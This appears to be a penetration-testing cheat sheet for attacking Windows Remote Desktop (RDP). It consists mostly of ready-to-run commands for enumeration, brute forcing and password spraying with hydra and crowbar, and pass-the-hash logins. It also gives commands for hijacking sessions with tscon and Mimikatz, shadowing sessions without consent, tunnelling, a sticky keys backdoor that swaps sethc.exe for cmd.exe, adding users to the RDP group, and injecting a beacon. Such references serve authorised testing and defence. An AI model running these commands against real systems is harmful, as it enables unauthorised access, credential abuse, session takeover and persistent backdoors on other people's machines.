Remote Desktop Protocol (RDP), developed by Microsoft, enables graphical interface connections between computers over a network. It runs over TCP port 3389.
Default Port: 3389
Enumeration
# Comprehensive scan (encryption, vuln-ms12-020, NTLM info)
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>
Security Layer and NLA Checks
# Security layer details
nmap --script rdp-enum-encryption -p 3389 <IP>
# NLA status check
nxc rdp <IP> -u <user> -p <password>
# Pre-auth screenshot (only if NLA disabled)
nxc rdp <IP> --nla-screenshot
# Authenticated screenshot
nxc rdp <IP> -u <user> -p <password> --screenshot
Brute Force and Password Spraying
RDP brute force can lock accounts. Use cautiously and check the account lockout policy first.
# Crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
# Hydra
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp
Connect with Credentials / Hash
# rdesktop
rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
# xfreerdp (more features)
xfreerdp /u:<username> /p:<password> /v:<IP>
xfreerdp /d:domain /u:<username> /pth:<hash> /v:<IP> # Pass-the-Hash
# Verify credentials with impacket
rdp_check <domain>/<username>:<password>@<IP>
Session Hijacking
With SYSTEM permissions you can access any open RDP session without the owner’s password:
# List open sessions
query user
# Connect to a session
tscon <ID> /dest:<SESSIONNAME>
# Via Mimikatz
ts::sessions
ts::remote /id:2
Hijacking an active RDP session will kick out the current user.
RDP Shadowing (Remote Control)
# List sessions on remote host
qwinsta /server:<IP>
quser /server:<IP>
# Shadow a session (may require consent)
mstsc /v:<IP> /shadow:<SESSION_ID> /control
# Without consent (if policy allows)
mstsc /v:<IP> /shadow:<SESSION_ID> /noconsentprompt /prompt
# Check shadowing policy
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v Shadow
Virtual Channel Tunneling (RDP over RDP)
# rdp2tcp for TCP tunneling over RDP
xfreerdp /u:<user> /v:<IP> /rdp2tcp:/path/to/rdp2tcp/client/rdp2tcp
Sticky Keys & Utilman Backdoor
Backdoor the accessibility programs to get a SYSTEM shell at the login screen:
# Create sticky keys backdoor (requires SYSTEM access)
# Replace sethc.exe with cmd.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\sethc.exe.bak
copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
# Press Shift 5 times at login screen for SYSTEM cmd
# Find pre-existing backdoors
# https://github.com/linuz/Sticky-Keys-Slayer
RDP Process Injection
If a user from a different domain or with better privileges connects via RDP and you are a local Admin:
# Inject beacon into RDP session process
# Details: windows-hardening/active-directory-methodology/rdp-sessions-abuse
Add User to RDP Group
net localgroup "Remote Desktop Users" UserLoginName /add
- AutoRDPwn — Automate Shadow attacks
- EvilRDP — Automated keyboard/mouse control, clipboard, SOCKS proxy
- SharpRDP — Execute commands without GUI
References
- Remote Desktop Services shadowing
- RDP tunneling (rdp2tcp)
